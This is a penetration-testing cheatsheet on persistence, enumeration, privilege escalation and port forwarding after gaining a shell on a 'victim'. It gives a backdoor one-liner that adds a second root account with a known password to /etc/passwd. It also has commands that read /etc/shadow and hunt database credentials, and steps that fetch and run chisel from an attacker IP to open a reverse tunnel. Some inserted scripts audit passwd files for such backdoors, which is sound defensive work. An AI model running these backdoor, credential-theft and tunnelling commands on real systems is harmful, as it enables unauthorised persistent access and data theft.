Persistence (Maintaining Access) - Privilege Escalation

After the privilege-escalation phase comes the establishment of persistent access to the target (backdoor, persistence module, ...).

echo "root2:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> /etc/passwd # append a second UID-0 account with password "toor" (needs write access to /etc/passwd); on recent OpenSSL use `openssl passwd -6 toor` for a SHA-512 crypt hash if the default scheme is rejected
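The one-liner above leaves two artefacts in /etc/passwd: a second account with UID 0, and a crypt hash sitting directly in the password field instead of the "x" shadow placeholder. The following script is an added example (not part of the original cheatsheet) that audits any passwd-format file for both; the sample file, including the root2 hash, is constructed inline, and the function names are ours. Pass /etc/passwd instead of the sample to audit a live host.

```sh
#!/bin/sh
# Added example: audit a passwd-format file for backdoor accounts.
#   1. every account with UID 0 (only "root" is expected)
#   2. every account whose password field is not a shadow placeholder
#      (x, *, !, !!): a crypt hash here authenticates straight from
#      /etc/passwd, and an empty field means no password at all.

# Print the names of all UID-0 accounts in the given passwd file.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Print accounts whose password field is a hash or empty rather than a placeholder.
weak_password_field() {
    awk -F: 'NF >= 7 && $2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" { print $1 }' "$1"
}

# Return 0 if the file looks clean, 1 if anything suspicious was found.
audit_passwd() {
    extra=$(uid0_accounts "$1" | grep -vx root || true)
    weak=$(weak_password_field "$1")
    [ -z "$extra" ] && [ -z "$weak" ]
}

# Constructed sample: a normal passwd file plus the root2 entry from the
# cheatsheet (the hash value is made up).
SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
root2:$1$Kx8fP2zq$1q2w3e4r5t6y7u8i9o0pA/:0:0:root:/root:/bin/bash
EOF

echo "UID 0 accounts:";            uid0_accounts "$SAMPLE_PASSWD"
echo "Non-placeholder passwords:"; weak_password_field "$SAMPLE_PASSWD"
audit_passwd "$SAMPLE_PASSWD" && echo "clean" || echo "SUSPICIOUS"
```

On the sample this reports root and root2 as UID 0 and root2 as carrying its own hash, so the audit fails; the same two checks are what a host-integrity monitor should alert on.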

User information gathering

Once we have a shell on the victim, we can gather a lot of information about the target with the following commands.

Linux

# DNS configuration
cat /etc/resolv.conf
# user account database (world-readable)
cat /etc/passwd
# password hashes; readable only by root (or the shadow group), so this needs elevated privileges
cat /etc/shadow
whoami # Display the username associated with the current effective UID.
who -a # Display information about all connected users.
ip a # shows (IPv4 or IPv6) addresses on a device.
iptables -L  # List all firewall rules (needs root).
# displays the routing table
ip r
netstat -r
# displays systems information
uname -a
ps aux
# List installed packages matching a given pattern.
dpkg -l | grep -i "<pattern>"

Windows

ipconfig /all
ipconfig /displaydns
netstat -bnao
netstat -r

net view
net view /domain
net user /domain
net user %username% /domain
net accounts
net localgroup administrators
net group "Domain controllers" /domain
net share

Linux Privilege Escalation

sudo -l # lists the commands the current user may run through sudo (and as which user)
cat /etc/sudoers.d/[filename] # drop-in sudoers rules (normally root-only, but check)

netstat -ltupn # listening TCP/UDP sockets with owning PID/program
ss -tulnp # same with ss (note: -w would list raw sockets, not listening ports)

cat /etc/crontab # system cron jobs; also check /etc/cron.d/ and the per-user crontabs

FIND

find / -iname "*config*.php" 2>/dev/null # look for config files, then: cat [filename] | grep -i "db_" for database credentials
find / -user root -perm -u=s 2>/dev/null # Find all files/dirs that are owned by root and have at least the SUID permission

find / -group [name] 2>/dev/null # Find all files/dirs owned by a group
find / -user [username] 2>/dev/null # Find all files/dirs owned by a user

-perm 444 # mode is exactly 444
-perm -444 # all of the given bits are set (readable by owner, group and others)
-perm /444 # at least one of the given bits is set (readable by owner, group or others)

-exec [command] [option] {} \; 2>/dev/null # {} is replaced by each path found; "\;" runs the command once per file (use "+" to batch them)
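The three -perm forms are easy to mix up, so here is an added example (not from the original cheatsheet) that builds a scratch directory with files of known modes and counts what each form matches, including the -u=s SUID test used above. The file names encode their octal mode and are constructed here; count_perm is our own helper.

```sh
#!/bin/sh
# Added example: compare find -perm MODE, -perm -MODE and -perm /MODE
# on files with known permission bits.

SCRATCH=$(mktemp -d)
trap 'rm -rf "$SCRATCH"' EXIT

# Constructed files; each name carries its own octal mode.
for mode in 444 644 400 040 000 4755; do
    : > "$SCRATCH/f$mode"
    chmod "$mode" "$SCRATCH/f$mode"
done

# Count regular files under directory $1 matching the -perm expression $2.
count_perm() {
    find "$1" -type f -perm "$2" 2>/dev/null | wc -l | tr -d ' '
}

echo "-perm 444  (mode is exactly 0444):           $(count_perm "$SCRATCH" 444)"
echo "-perm -444 (all three read bits set):         $(count_perm "$SCRATCH" -444)"
echo "-perm /444 (at least one read bit set):       $(count_perm "$SCRATCH" /444)"
echo "-perm -u=s (setuid bit set, other bits free): $(count_perm "$SCRATCH" -u=s)"
```

Only f444 matches the exact form; f444, f644 and f4755 have all three read bits set; every file except f000 has at least one read bit; and only f4755 carries the setuid bit. When hunting SUID binaries you want the "-" form (-perm -4000 or -perm -u=s), never the exact one, because a real setuid binary is almost always 4755 or 4750.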

Capabilities

getcap -r / 2>/dev/null # scan the system for file capabilities (cap_setuid, cap_dac_read_search, cap_sys_admin... on an unexpected binary are the interesting ones).

GREP

grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" # grep ip addresses from your output.
grep -rni "somethingToLookFor" / 2>/dev/null # recursive, case-insensitive, with line numbers
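The IP regex above is a quick filter, but \b([0-9]{1,3}\.){3}[0-9]{1,3}\b also accepts octets above 255 and anything else shaped like four dotted numbers. The following is an added example (not from the original cheatsheet) that applies the regex to constructed sample output, drops candidates with an octet over 255 and de-duplicates the result; the sample text and the extract_ips name are ours. Version strings such as 2.6.32.1 survive because they are syntactically valid addresses: only context can remove those.

```sh
#!/bin/sh
# Added example: extract IPv4 addresses from command output and discard
# candidates with an out-of-range octet.

# Constructed sample: a mix of ip a / netstat style output and a log line.
SAMPLE_OUTPUT='inet 10.10.10.10/24 brd 10.10.10.255 scope global eth0
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
kernel 2.6.32.1 build 999.1.1.1 seen from 192.168.0.100
GET /app HTTP/1.1 from 10.10.10.10 and 172.17.0.2'

# Print unique IPv4 addresses found on stdin whose octets are all <= 255.
extract_ips() {
    grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' \
    | awk -F. '$1 <= 255 && $2 <= 255 && $3 <= 255 && $4 <= 255' \
    | sort -u
}

printf '%s\n' "$SAMPLE_OUTPUT" | extract_ips
```

On the sample this yields six addresses: 999.1.1.1 is dropped by the octet check, while 0.0.0.0, the three RFC 1918 hosts, 10.10.10.255 and the kernel version 2.6.32.1 remain.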

Port forwarding

Using Chisel

# on the attacker
cd /path/where/chisel/is # binary file
updog # or any other command to setup an http server

# on the victim
wget IP:PORT/chisel
chmod +x chisel # set it executable

# on the attacker
chisel server --reverse --port 9002 # listen for clients; --reverse lets them open remote-forwarded ports on this host

# on the victim
./chisel client YOUR_IP:9002 R:9001:[redirectedIP]:[redirectedPort] # R: = reverse tunnel, opened on the attacker side

# The attacker can now reach [redirectedIP]:[redirectedPort] (as seen from the victim) via localhost:9001 on their own machine.

Using SSH

ssh -N user@[remote_IP] -L [local_bind_address]:[local_port]:[target_IP]:[target_port] # -N: no remote command, tunnel only

Example:

ssh -N user@10.10.10.10 -L 127.0.0.1:4441:192.168.0.100:80

From the 10.10.10.10 machine, a web server is reachable at 192.168.0.100:80. The tunnel binds 127.0.0.1:4441 on the attacker's machine and relays it through 10.10.10.10 to that server, so http://127.0.0.1:4441 is reachable from the browser. Pointing the browser at a proxy (here Burp Suite listening on 172.17.0.2:4440) lets you intercept and modify the requests if needed.

Automated scripts for linux privesc

LSE - linux-smart-enumeration

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh

curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh;chmod 700 lse.sh

LES - linux-exploit-suggester

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh;chmod 700 les.sh

LinPEAS - Linux Privilege Escalation Awesome Script

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -Lo lPEAS.sh;chmod 700 lPEAS.sh